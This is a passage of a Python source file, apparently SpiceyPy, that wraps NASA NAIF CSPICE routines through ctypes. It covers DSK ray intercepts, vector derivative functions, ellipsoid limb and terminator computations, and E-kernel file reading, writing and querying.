dskdsc = stypes.SpiceDSKDescr()
dc = stypes.emptyDoubleVector(1)
ic = stypes.emptyIntVector(1)
found = ctypes.c_int()
libspice.dskxsi_c(pri, target, nsurf, srflst, et, fixref, vertex, raydir, maxd, maxi, xpt, handle, dladsc, dskdsc, dc, ic, found)
return stypes.cVectorToPython(xpt), handle.value, dladsc, dskdsc, stypes.cVectorToPython(dc), stypes.cVectorToPython(ic), bool(found.value)
@spiceErrorCheck
def dskxv(pri, target, srflst, et, fixref, vtxarr, dirarr):
"""
Compute ray-surface intercepts for a set of rays, using data
provided by multiple loaded DSK segments.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dskxv_c.html
:param pri: Data prioritization flag.
:type pri: bool
:param target: Target body name.
:type target: str
:param srflst: Surface ID list.
:type srflst: list of int
:param et: Epoch, expressed as seconds past J2000 TDB.
:type et: float
:param fixref: Name of target body-fixed reference frame.
:type fixref: str
:param vtxarr: Array of vertices of rays.
:type vtxarr: Nx3-Element Array of floats
:param dirarr: Array of direction vectors of rays.
:type dirarr: Nx3-Element Array of floats
:return: Intercept point array and Found flag array.
:rtype: tuple
"""
pri = ctypes.c_int(pri)
target = stypes.stringToCharP(target)
nsurf = ctypes.c_int(len(srflst))
srflst = stypes.toIntVector(srflst)
et = ctypes.c_double(et)
fixref = stypes.stringToCharP(fixref)
nray = ctypes.c_int(len(vtxarr))
vtxarr = stypes.toDoubleMatrix(vtxarr)
dirarr = stypes.toDoubleMatrix(dirarr)
xptarr = stypes.emptyDoubleMatrix(y=nray)
fndarr = stypes.emptyIntVector(nray)
libspice.dskxv_c(pri, target, nsurf, srflst, et, fixref, nray, vtxarr, dirarr, xptarr, fndarr)
return stypes.cMatrixToNumpy(xptarr), stypes.cVectorToPython(fndarr)
@spiceErrorCheck
def dskz02(handle, dladsc):
"""
Return plate model size parameters---plate count and
vertex count---for a type 2 DSK segment.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dskz02_c.html
:param handle: DSK file handle.
:type handle: int
:param dladsc: DLA descriptor.
:type dladsc: spiceypy.utils.support_types.SpiceDLADescr
:return: Number of vertices, Number of plates.
:rtype: tuple
"""
handle = ctypes.c_int(handle)
nv = ctypes.c_int()
np = ctypes.c_int()
libspice.dskz02_c(handle, dladsc, ctypes.byref(nv), ctypes.byref(np))
return nv.value, np.value
@spiceErrorCheck
def dsphdr(x, y, z):
"""
This routine computes the Jacobian of the transformation from
rectangular to spherical coordinates.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dsphdr_c.html
:param x: X-coordinate of point.
:type x: float
:param y: Y-coordinate of point.
:type y: float
:param z: Z-coordinate of point.
:type z: float
:return: Matrix of partial derivatives.
:rtype: 3x3-Element Array of floats
"""
x = ctypes.c_double(x)
y = ctypes.c_double(y)
z = ctypes.c_double(z)
jacobi = stypes.emptyDoubleMatrix()
libspice.dsphdr_c(x, y, z, jacobi)
return stypes.cMatrixToNumpy(jacobi)
@spiceErrorCheck
@spiceFoundExceptionThrower
def dtpool(name):
"""
Return the data about a kernel pool variable.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dtpool_c.html
:param name: Name of the variable whose value is to be returned.
:type name: str
:return:
Number of values returned for name,
Type of the variable "C", "N", or "X".
:rtype: tuple
"""
name = stypes.stringToCharP(name)
found = ctypes.c_int()
n = ctypes.c_int()
typeout = ctypes.c_char()
libspice.dtpool_c(name, ctypes.byref(found), ctypes.byref(n),
ctypes.byref(typeout))
return n.value, stypes.toPythonString(typeout.value), bool(found.value)
@spiceErrorCheck
def ducrss(s1, s2):
"""
Compute the unit vector parallel to the cross product of
two 3-dimensional vectors and the derivative of this unit vector.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ducrss_c.html
:param s1: Left hand state for cross product and derivative.
:type s1: 6-Element Array of floats
:param s2: Right hand state for cross product and derivative.
:type s2: 6-Element Array of floats
:return: Unit vector and derivative of the cross product.
:rtype: 6-Element Array of floats
"""
assert len(s1) is 6 and len(s2) is 6
s1 = stypes.toDoubleVector(s1)
s2 = stypes.toDoubleVector(s2)
sout = stypes.emptyDoubleVector(6)
libspice.ducrss_c(s1, s2, sout)
return stypes.cVectorToPython(sout)
@spiceErrorCheck
def dvcrss(s1, s2):
"""
Compute the cross product of two 3-dimensional vectors
and the derivative of this cross product.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dvcrss_c.html
:param s1: Left hand state for cross product and derivative.
:type s1: 6-Element Array of floats
:param s2: Right hand state for cross product and derivative.
:type s2: 6-Element Array of floats
:return: State associated with cross product of positions.
:rtype: 6-Element Array of floats
"""
assert len(s1) is 6 and len(s2) is 6
s1 = stypes.toDoubleVector(s1)
s2 = stypes.toDoubleVector(s2)
sout = stypes.emptyDoubleVector(6)
libspice.dvcrss_c(s1, s2, sout)
return stypes.cVectorToPython(sout)
@spiceErrorCheck
def dvdot(s1, s2):
"""
Compute the derivative of the dot product of two double
precision position vectors.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dvdot_c.html
:param s1: First state vector in the dot product.
:type s1: 6-Element Array of floats
:param s2: Second state vector in the dot product.
:type s2: 6-Element Array of floats
:return: The derivative of the dot product.
:rtype: float
"""
assert len(s1) is 6 and len(s2) is 6
s1 = stypes.toDoubleVector(s1)
s2 = stypes.toDoubleVector(s2)
return libspice.dvdot_c(s1, s2)
@spiceErrorCheck
def dvhat(s1):
"""
Find the unit vector corresponding to a state vector and the
derivative of the unit vector.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dvhat_c.html
:param s1: State to be normalized.
:type s1: 6-Element Array of floats
:return: Unit vector s1 / abs(s1), and its time derivative.
:rtype: 6-Element Array of floats
"""
assert len(s1) is 6
s1 = stypes.toDoubleVector(s1)
sout = stypes.emptyDoubleVector(6)
libspice.dvhat_c(s1, sout)
return stypes.cVectorToPython(sout)
@spiceErrorCheck
def dvnorm(state):
"""
Function to calculate the derivative of the norm of a 3-vector.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dvnorm_c.html
:param state:
A 6-vector composed of three coordinates and their derivatives.
:type state: 6-Element Array of floats
:return: The derivative of the norm of a 3-vector.
:rtype: float
"""
assert len(state) is 6
state = stypes.toDoubleVector(state)
return libspice.dvnorm_c(state)
@spiceErrorCheck
def dvpool(name):
"""
Delete a variable from the kernel pool.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dvpool_c.html
:param name: Name of the kernel variable to be deleted.
:type name: str
"""
name = stypes.stringToCharP(name)
libspice.dvpool_c(name)
@spiceErrorCheck
def dvsep(s1, s2):
"""
Calculate the time derivative of the separation angle between
two input states, S1 and S2.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dvsep_c.html
:param s1: State vector of the first body.
:type s1: 6-Element Array of floats
:param s2: State vector of the second body.
:type s2: 6-Element Array of floats
:return: The time derivative of the angular separation between S1 and S2.
:rtype: float
"""
assert len(s1) is 6 and len(s2) is 6
s1 = stypes.toDoubleVector(s1)
s2 = stypes.toDoubleVector(s2)
return libspice.dvsep_c(s1, s2)
################################################################################
# E
@spiceErrorCheck
def edlimb(a, b, c, viewpt):
"""
Find the limb of a triaxial ellipsoid, viewed from a specified point.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/edlimb_c.html
:param a: Length of ellipsoid semi-axis lying on the x-axis.
:type a: float
:param b: Length of ellipsoid semi-axis lying on the y-axis.
:type b: float
:param c: Length of ellipsoid semi-axis lying on the z-axis.
:type c: float
:param viewpt: Location of viewing point.
:type viewpt: 3-Element Array of floats
:return: Limb of ellipsoid as seen from viewing point.
:rtype: spiceypy.utils.support_types.Ellipse
"""
limb = stypes.Ellipse()
a = ctypes.c_double(a)
b = ctypes.c_double(b)
c = ctypes.c_double(c)
viewpt = stypes.toDoubleVector(viewpt)
libspice.edlimb_c(a, b, c, viewpt, ctypes.byref(limb))
return limb
@spiceErrorCheck
def edterm(trmtyp, source, target, et, fixref, abcorr, obsrvr, npts):
"""
Compute a set of points on the umbral or penumbral terminator of
a specified target body, where the target shape is modeled as an
ellipsoid.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/edterm_c.html
:param trmtyp: Terminator type.
:type trmtyp: str
:param source: Light source.
:type source: str
:param target: Target body.
:type target: str
:param et: Observation epoch.
:type et: str
:param fixref: Body-fixed frame associated with target.
:type fixref: str
:param abcorr: Aberration correction.
:type abcorr: str
:param obsrvr: Observer.
:type obsrvr: str
:param npts: Number of points in terminator set.
:type npts: int
:return:
Epoch associated with target center,
Position of observer in body-fixed frame,
Terminator point set.
:rtype: tuple
"""
trmtyp = stypes.stringToCharP(trmtyp)
source = stypes.stringToCharP(source)
target = stypes.stringToCharP(target)
et = ctypes.c_double(et)
fixref = stypes.stringToCharP(fixref)
abcorr = stypes.stringToCharP(abcorr)
obsrvr = stypes.stringToCharP(obsrvr)
trgepc = ctypes.c_double()
obspos = stypes.emptyDoubleVector(3)
trmpts = stypes.emptyDoubleMatrix(x=3, y=npts)
npts = ctypes.c_int(npts)
libspice.edterm_c(trmtyp, source, target, et, fixref, abcorr, obsrvr, npts,
ctypes.byref(trgepc), obspos, trmpts)
return trgepc.value, stypes.cVectorToPython(obspos), stypes.cMatrixToNumpy(
trmpts)
@spiceErrorCheck
def ekacec(handle, segno, recno, column, nvals, cvals, isnull):
"""
Add data to a character column in a specified EK record.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekacec_c.html
:param handle: EK file handle.
:type handle: int
:param segno: Index of segment containing record.
:type segno: int
:param recno: Record to which data is to be added.
:type recno: int
:param column: Column name.
:type column: str
:param nvals: Number of values to add to column.
:type nvals: int
:param cvals: Character values to add to column.
:type cvals: list of str.
:param isnull: Flag indicating whether column entry is null.
:type isnull: bool
"""
handle = ctypes.c_int(handle)
segno = ctypes.c_int(segno)
recno = ctypes.c_int(recno)
column = stypes.stringToCharP(column)
nvals = ctypes.c_int(nvals)
vallen = ctypes.c_int(len(max(cvals, key=len)) + 1)
cvals = stypes.listToCharArrayPtr(cvals)
isnull = ctypes.c_int(isnull)
libspice.ekacec_c(handle, segno, recno, column, nvals, vallen, cvals, isnull)
@spiceErrorCheck
def ekaced(handle, segno, recno, column, nvals, dvals, isnull):
"""
Add data to an double precision column in a specified EK record.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekaced_c.html
:param handle: EK file handle.
:type handle: int
:param segno: Index of segment containing record.
:type segno: int
:param recno: Record to which data is to be added.
:type recno: int
:param column: Column name.
:type column: str
:param nvals: Number of values to add to column.
:type nvals: int
:param dvals: Double precision values to add to column.
:type dvals: Array of floats
:param isnull: Flag indicating whether column entry is null.
:type isnull: bool
"""
handle = ctypes.c_int(handle)
segno = ctypes.c_int(segno)
recno = ctypes.c_int(recno)
column = stypes.stringToCharP(column)
nvals = ctypes.c_int(nvals)
dvals = stypes.toDoubleVector(dvals)
isnull = ctypes.c_int(isnull)
libspice.ekaced_c(handle, segno, recno, column, nvals, dvals, isnull)
@spiceErrorCheck
def ekacei(handle, segno, recno, column, nvals, ivals, isnull):
"""
Add data to an integer column in a specified EK record.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekacei_c.html
:param handle: EK file handle.
:type handle: int
:param segno: Index of segment containing record.
:type segno: int
:param recno: Record to which data is to be added.
:type recno: int
:param column: Column name.
:type column: str
:param nvals: Number of values to add to column.
:type nvals: int
:param ivals: Integer values to add to column.
:type ivals: Array of ints
:param isnull: Flag indicating whether column entry is null.
:type isnull: bool
"""
handle = ctypes.c_int(handle)
segno = ctypes.c_int(segno)
recno = ctypes.c_int(recno)
column = stypes.stringToCharP(column)
nvals = ctypes.c_int(nvals)
ivals = stypes.toIntVector(ivals)
isnull = ctypes.c_int(isnull)
libspice.ekacei_c(handle, segno, recno, column, nvals, ivals, isnull)
@spiceErrorCheck
def ekaclc(handle, segno, column, vallen, cvals, entszs, nlflgs, rcptrs,
wkindx):
"""
Add an entire character column to an EK segment.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekaclc_c.html
:param handle: EK file handle.
:type handle: int
:param segno: Number of segment to add column to.
:type segno: int
:param column: Column name.
:type column: str
:param vallen: Length of character values.
:type vallen: int
:param cvals: Character values to add to column.
:type cvals: list of str.
:param entszs: Array of sizes of column entries.
:type entszs: Array of ints
:param nlflgs: Array of null flags for column entries.
:type nlflgs: Array of bools
:param rcptrs: Record pointers for segment.
:type rcptrs: Array of ints
:param wkindx: Work space for column index.
:type wkindx: Array of ints
:return: Work space for column index.
:rtype: Array of ints
"""
handle = ctypes.c_int(handle)
segno = ctypes.c_int(segno)
column = stypes.stringToCharP(column)
vallen = ctypes.c_int(vallen)
cvals = stypes.listToCharArrayPtr(cvals)
entszs = stypes.toIntVector(entszs)
nlflgs = stypes.toIntVector(nlflgs)
rcptrs = stypes.toIntVector(rcptrs)
wkindx = stypes.toIntVector(wkindx)
libspice.ekaclc_c(handle, segno, column, vallen, cvals, entszs, nlflgs,
rcptrs, wkindx)
return stypes.cVectorToPython(wkindx)
@spiceErrorCheck
def ekacld(handle, segno, column, dvals, entszs, nlflgs, rcptrs, wkindx):
"""
Add an entire double precision column to an EK segment.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekacld_c.html
:param handle: EK file handle.
:type handle: int
:param segno: Number of segment to add column to.
:type segno: int
:param column: Column name.
:type column: str
:param dvals: Double precision values to add to column.
:type dvals: Array of floats
:param entszs: Array of sizes of column entries.
:type entszs: Array of ints
:param nlflgs: Array of null flags for column entries.
:type nlflgs: Array of bools
:param rcptrs: Record pointers for segment.
:type rcptrs: Array of ints
:param wkindx: Work space for column index.
:type wkindx: Array of ints
:return: Work space for column index.
:rtype: Array of ints
"""
handle = ctypes.c_int(handle)
segno = ctypes.c_int(segno)
column = stypes.stringToCharP(column)
dvals = stypes.toDoubleVector(dvals)
entszs = stypes.toIntVector(entszs)
nlflgs = stypes.toIntVector(nlflgs)
rcptrs = stypes.toIntVector(rcptrs)
wkindx = stypes.toIntVector(wkindx)
libspice.ekacld_c(handle, segno, column, dvals, entszs, nlflgs, rcptrs,
wkindx)
return stypes.cVectorToPython(wkindx)
@spiceErrorCheck
def ekacli(handle, segno, column, ivals, entszs, nlflgs, rcptrs, wkindx):
"""
Add an entire integer column to an EK segment.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekacli_c.html
:param handle: EK file handle.
:type handle: int
:param segno: Number of segment to add column to.
:type segno: int
:param column: Column name.
:type column: str
:param ivals: Integer values to add to column.
:type ivals: Array of ints
:type entszs: Array of ints
:param nlflgs: Array of null flags for column entries.
:type nlflgs: Array of bools
:param rcptrs: Record pointers for segment.
:type rcptrs: Array of ints
:param wkindx: Work space for column index.
:type wkindx: Array of ints
:return: Work space for column index.
:rtype: Array of ints
"""
handle = ctypes.c_int(handle)
segno = ctypes.c_int(segno)
column = stypes.stringToCharP(column)
ivals = stypes.toIntVector(ivals)
entszs = stypes.toIntVector(entszs)
nlflgs = stypes.toIntVector(nlflgs)
rcptrs = stypes.toIntVector(rcptrs)
wkindx = stypes.toIntVector(wkindx)
libspice.ekacli_c(handle, segno, column, ivals, entszs, nlflgs, rcptrs,
wkindx)
return stypes.cVectorToPython(wkindx)
@spiceErrorCheck
def ekappr(handle, segno):
"""
Append a new, empty record at the end of a specified E-kernel segment.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekappr_c.html
:param handle: File handle.
:type handle: int
:param segno: Segment number.
:type segno: int
:return: Number of appended record.
:rtype: int
"""
handle = ctypes.c_int(handle)
segno = ctypes.c_int(segno)
recno = ctypes.c_int()
libspice.ekappr_c(handle, segno, ctypes.byref(recno))
return recno.value
@spiceErrorCheck
def ekbseg(handle, tabnam, cnames, decls):
"""
Start a new segment in an E-kernel.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekbseg_c.html
:param handle: File handle.
:type handle: int
:param tabnam: Table name.
:type tabnam: str
:param cnames: Names of columns.
:type cnames: list of str.
:param decls: Declarations of columns.
:type decls: list of str.
:return: Segment number.
:rtype: int
"""
handle = ctypes.c_int(handle)
tabnam = stypes.stringToCharP(tabnam)
ncols = ctypes.c_int(len(cnames))
cnmlen = ctypes.c_int(len(max(cnames, key=len)) + 1) # needs to be len(name)+1 ie 'c1' to 3 for ekbseg do not fail
cnames = stypes.listToCharArrayPtr(cnames)
declen = ctypes.c_int(len(max(decls, key=len)) + 1)
decls = stypes.listToCharArrayPtr(decls)
segno = ctypes.c_int()
libspice.ekbseg_c(handle, tabnam, ncols, cnmlen, cnames, declen, decls, ctypes.byref(segno))
return segno.value
@spiceErrorCheck
def ekccnt(table):
"""
Return the number of distinct columns in a specified,
currently loaded table.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekccnt_c.html
:param table: Name of table.
:type table: str
:return: Count of distinct, currently loaded columns.
:rtype: int
"""
table = stypes.stringToCharP(table)
ccount = ctypes.c_int()
libspice.ekccnt_c(table, ctypes.byref(ccount))
return ccount.value
@spiceErrorCheck
def ekcii(table, cindex, lenout=_default_len_out):
"""
Return attribute information about a column belonging to a loaded
EK table, specifying the column by table and index.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekcii_c.html
:param table: Name of table containing column.
:type table: str
:param cindex: Index of column whose attributes are to be found.
:type cindex: int
:param lenout: Maximum allowed length of column name.
:return: Name of column, Column attribute descriptor.
:rtype: tuple
"""
table = stypes.stringToCharP(table)
cindex = ctypes.c_int(cindex)
lenout = ctypes.c_int(lenout)
column = stypes.stringToCharP(lenout)
attdsc = stypes.SpiceEKAttDsc()
libspice.ekcii_c(table, cindex, lenout, column, ctypes.byref(attdsc))
return stypes.toPythonString(column), attdsc
@spiceErrorCheck
def ekcls(handle):
"""
Close an E-kernel.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekcls_c.html
:param handle: EK file handle.
:type handle: int
"""
handle = ctypes.c_int(handle)
libspice.ekcls_c(handle)
@spiceErrorCheck
def ekdelr(handle, segno, recno):
"""
Delete a specified record from a specified E-kernel segment.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekdelr_c.html
:param handle: File handle.
:type handle: int
:param segno: Segment number.
:type segno: int
:param recno: Record number.
:type recno: int
"""
handle = ctypes.c_int(handle)
segno = ctypes.c_int(segno)
recno = ctypes.c_int(recno)
libspice.ekdelr_c(handle, segno, recno)
@spiceErrorCheck
def ekffld(handle, segno, rcptrs):
"""
Complete a fast write operation on a new E-kernel segment.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekffld_c.html
:param handle: File handle.
:type handle: int
:param segno: Segment number.
:type segno: int
:param rcptrs: Record pointers.
:type rcptrs: Array of ints
"""
handle = ctypes.c_int(handle)
segno = ctypes.c_int(segno)
rcptrs = stypes.toIntVector(rcptrs)
libspice.ekffld_c(handle, segno,
ctypes.cast(rcptrs, ctypes.POINTER(ctypes.c_int)))
@spiceErrorCheck
def ekfind(query, lenout=_default_len_out):
"""
Find E-kernel data that satisfy a set of constraints.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekfind_c.html
:param query: Query specifying data to be found.
:type query: str
:param lenout: Declared length of output error message string.
:type lenout: int
:return:
Number of matching rows,
Flag indicating whether query parsed correctly,
Parse error description.
:rtype: tuple
"""
query = stypes.stringToCharP(query)
lenout = ctypes.c_int(lenout)
nmrows = ctypes.c_int()
error = ctypes.c_int()
errmsg = stypes.stringToCharP(lenout)
libspice.ekfind_c(query, lenout, ctypes.byref(nmrows), ctypes.byref(error),
errmsg)
return nmrows.value, error.value, stypes.toPythonString(errmsg)
@spiceErrorCheck
@spiceFoundExceptionThrower
def ekgc(selidx, row, element, lenout=_default_len_out):
"""
Return an element of an entry in a column of character type in a specified
row.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekgc_c.html
:param selidx: Index of parent column in SELECT clause.
:type selidx: int
:param row: Row to fetch from.
:type row: int
:param element: Index of element, within column entry, to fetch.
:type element: int
:param lenout: Maximum length of column element.
:type lenout: int
:return:
Character string element of column entry,
Flag indicating whether column entry was null.
:rtype: tuple
"""
selidx = ctypes.c_int(selidx)
row = ctypes.c_int(row)
element = ctypes.c_int(element)
lenout = ctypes.c_int(lenout)
null = ctypes.c_int()
found = ctypes.c_int()
cdata = stypes.stringToCharP(lenout)
libspice.ekgc_c(selidx, row, element, lenout, cdata, ctypes.byref(null), ctypes.byref(found))
return stypes.toPythonString(cdata), null.value, bool(found.value)
@spiceErrorCheck
@spiceFoundExceptionThrower
def ekgd(selidx, row, element):
"""
Return an element of an entry in a column of double precision type in a
specified row.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekgd_c.html
:param selidx: Index of parent column in SELECT clause.
:type selidx: int
:param row: Row to fetch from.
:type row: int
:param element: Index of element, within column entry, to fetch.
:type element: int
:return:
Double precision element of column entry,
Flag indicating whether column entry was null.
:rtype: tuple
"""
selidx = ctypes.c_int(selidx)
row = ctypes.c_int(row)
element = ctypes.c_int(element)
ddata = ctypes.c_double()
null = ctypes.c_int()
found = ctypes.c_int()
libspice.ekgd_c(selidx, row, element, ctypes.byref(ddata),
ctypes.byref(null), ctypes.byref(found))
return ddata.value, null.value, bool(found.value)
@spiceErrorCheck
@spiceFoundExceptionThrower
def ekgi(selidx, row, element):
"""
Return an element of an entry in a column of integer type in a specified
row.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekgi_c.html
:param selidx: Index of parent column in SELECT clause.
:type selidx: int
:param row: Row to fetch from.
:type row: int
:param element: Index of element, within column entry, to fetch.
:type element: int
:return:
Integer element of column entry,
Flag indicating whether column entry was null.
:rtype: tuple
"""
selidx = ctypes.c_int(selidx)
row = ctypes.c_int(row)
element = ctypes.c_int(element)
idata = ctypes.c_int()
null = ctypes.c_int()
found = ctypes.c_int()
libspice.ekgi_c(selidx, row, element, ctypes.byref(idata),
ctypes.byref(null), ctypes.byref(found))
return idata.value, null.value, bool(found.value)
@spiceErrorCheck
def ekifld(handle, tabnam, ncols, nrows, cnmlen, cnames, declen, decls):
"""
Initialize a new E-kernel segment to allow fast writing.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekifld_c.html
:param handle: File handle.
:type handle: int
:param tabnam: Table name.
:type tabnam: str
:param ncols: Number of columns in the segment.
:type ncols: int
:param nrows: Number of rows in the segment.
:type nrows: int
:param cnmlen: Length of names in in column name array.
:type cnmlen: int
:param cnames: Names of columns.
:type cnames: list of str.
:param declen: Length of declaration strings in declaration array.
:type declen: int
:param decls: Declarations of columns.
:type decls: list of str.
:return: Segment number, Array of record pointers.
:rtype: tuple
"""
handle = ctypes.c_int(handle)
tabnam = stypes.stringToCharP(tabnam)
ncols = ctypes.c_int(ncols)
nrows = ctypes.c_int(nrows)
cnmlen = ctypes.c_int(cnmlen)
cnames = stypes.listToCharArray(cnames)
declen = ctypes.c_int(declen)
recptrs = stypes.emptyIntVector(nrows)
decls = stypes.listToCharArray(decls)
segno = ctypes.c_int()
libspice.ekifld_c(handle, tabnam, ncols, nrows, cnmlen, cnames, declen,
decls, ctypes.byref(segno), recptrs)
return segno.value, stypes.cVectorToPython(recptrs)
@spiceErrorCheck
def ekinsr(handle, segno, recno):
"""
Add a new, empty record to a specified E-kernel segment at a specified
index.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekinsr_c.html
:param handle: File handle.
:type handle: int
:param segno: Segment number.
:type segno: int
:param recno: Record number.
:type recno: int
"""
handle = ctypes.c_int(handle)
segno = ctypes.c_int(segno)
recno = ctypes.c_int(recno)
libspice.ekinsr_c(handle, segno, recno)
@spiceErrorCheck
def eklef(fname):
"""
Load an EK file, making it accessible to the EK readers.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/eklef_c.html
:param fname: Name of EK file to load.
:type fname: str
:return: File handle of loaded EK file.
:rtype: int
"""
fname = stypes.stringToCharP(fname)
handle = ctypes.c_int()
libspice.eklef_c(fname, ctypes.byref(handle))
return handle.value
@spiceErrorCheck
def eknelt(selidx, row):
"""
Return the number of elements in a specified column entry in
the current row.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/eknelt_c.html
:param selidx: Index of parent column in SELECT clause.
:type selidx: int
:param row: Row containing element.
:type row: int
:return: The number of elements in entry in current row.
:rtype: int
"""
selidx = ctypes.c_int(selidx)
row = ctypes.c_int(row)
return libspice.eknelt_c(selidx, row)
@spiceErrorCheck
def eknseg(handle):
"""
Return the number of segments in a specified EK.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/eknseg_c.html
:param handle: EK file handle.
:type handle: int
:return: The number of segments in the specified E-kernel.
:rtype: int
"""
handle = ctypes.c_int(handle)
return libspice.eknseg_c(handle)
@spiceErrorCheck
def ekntab():
"""
Return the number of loaded EK tables.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekntab_c.html
:return: The number of loaded EK tables.
:rtype: int
"""
n = ctypes.c_int(0)
libspice.ekntab_c(ctypes.byref(n))
return n.value
@spiceErrorCheck
def ekopn(fname, ifname, ncomch):
"""
Open a new E-kernel file and prepare the file for writing.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekopn_c.html
:param fname: Name of EK file.
:type fname: str
:param ifname: Internal file name.
:type ifname: str
:param ncomch: The number of characters to reserve for comments.
:type ncomch: int
:return: Handle attached to new EK file.
:rtype: int
"""
fname = stypes.stringToCharP(fname)
ifname = stypes.stringToCharP(ifname)
ncomch = ctypes.c_int(ncomch)
handle = ctypes.c_int()
libspice.ekopn_c(fname, ifname, ncomch, ctypes.byref(handle))
return handle.value
@spiceErrorCheck
def ekopr(fname):
"""
Open an existing E-kernel file for reading.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekopr_c.html
:param fname: Name of EK file.
:type fname: str
:return: Handle attached to EK file.
:rtype: int
"""
fname = stypes.stringToCharP(fname)
handle = ctypes.c_int()
libspice.ekopr_c(fname, ctypes.byref(handle))
return handle.value
@spiceErrorCheck
def ekops():
"""
Open a scratch (temporary) E-kernel file and prepare the file
for writing.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekops_c.html
:return: Handle attached to new EK file.
:rtype: int
"""
handle = ctypes.c_int()
libspice.ekops_c(ctypes.byref(handle))
return handle.value
@spiceErrorCheck
def ekopw(fname):
"""
Open an existing E-kernel file for writing.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekopw_c.html
:param fname: Name of EK file.
:type fname: str
:return: Handle attached to EK file.
:rtype: int
"""
fname = stypes.stringToCharP(fname)
handle = ctypes.c_int()
libspice.ekopw_c(fname, ctypes.byref(handle))
return handle.value
@spiceErrorCheck
def ekpsel(query, msglen, tablen, collen):
"""
Parse the SELECT clause of an EK query, returning full particulars
concerning each selected item.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekpsel_c.html
note: oddly docs at url are incomplete/incorrect.
:param query: EK query.
:type query: str
:param msglen: Available space in the output error message string.
:type msglen: int
:param tablen: UNKNOWN? Length of Table?
:type tablen: int
:param collen: UNKOWN? Length of Column?
:return:
Number of items in SELECT clause of query,
Begin positions of expressions in SELECT clause,
End positions of expressions in SELECT clause,
Data types of expressions,
Classes of expressions,
Names of tables qualifying SELECT columns,
Names of columns in SELECT clause of query,
Error flag,
Parse error message.
:rtype: tuple
"""
query = stypes.stringToCharP(query)
msglen = ctypes.c_int(msglen)
tablen = ctypes.c_int(tablen)
collen = ctypes.c_int(collen)
n = ctypes.c_int()
xbegs = stypes.emptyIntVector(_SPICE_EK_MAXQSEL)
xends = stypes.emptyIntVector(_SPICE_EK_MAXQSEL)
xtypes = stypes.emptyIntVector(_SPICE_EK_MAXQSEL)
xclass = stypes.emptyIntVector(_SPICE_EK_MAXQSEL)
tabs = stypes.emptyCharArray(yLen=_SPICE_EK_MAXQSEL, xLen=tablen)
cols = stypes.emptyCharArray(yLen=_SPICE_EK_MAXQSEL, xLen=collen)
error = ctypes.c_int()
errmsg = stypes.stringToCharP(msglen)
libspice.ekpsel_c(query, msglen, tablen, collen, ctypes.byref(n),
xbegs, xends, xtypes, xclass, ctypes.byref(tabs),
ctypes.byref(cols), ctypes.byref(error), errmsg)
return (n.value,
stypes.cVectorToPython(xbegs)[:n.value],
stypes.cVectorToPython(xends)[:n.value],
stypes.cVectorToPython(xtypes)[:n.value],
stypes.cVectorToPython(xclass)[:n.value],
stypes.cVectorToPython(tabs)[:n.value],
stypes.cVectorToPython(cols)[:n.value],
error.value,
stypes.toPythonString(errmsg))
@spiceErrorCheck
def ekrcec(handle, segno, recno, column, lenout, nelts=_SPICE_EK_EKRCEX_ROOM_DEFAULT):
"""
Read data from a character column in a specified EK record.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekrcec_c.html
:param handle: Handle attached to EK file.
:type handle: int
:param segno: Index of segment containing record.
:type segno: int
:param recno: Record from which data is to be read.
:type recno: int
:param column: Column name.
:type column: str
:param lenout: Maximum length of output strings.
:type lenout: int
:param nelts: Number of elements to allow for (default=100)
:type nelts: int
:return:
Number of values in column entry,
Character values in column entry,
Flag indicating whether column entry is null.
:rtype: tuple
"""
handle = ctypes.c_int(handle)
segno = ctypes.c_int(segno)
recno = ctypes.c_int(recno)
column = stypes.stringToCharP(column)
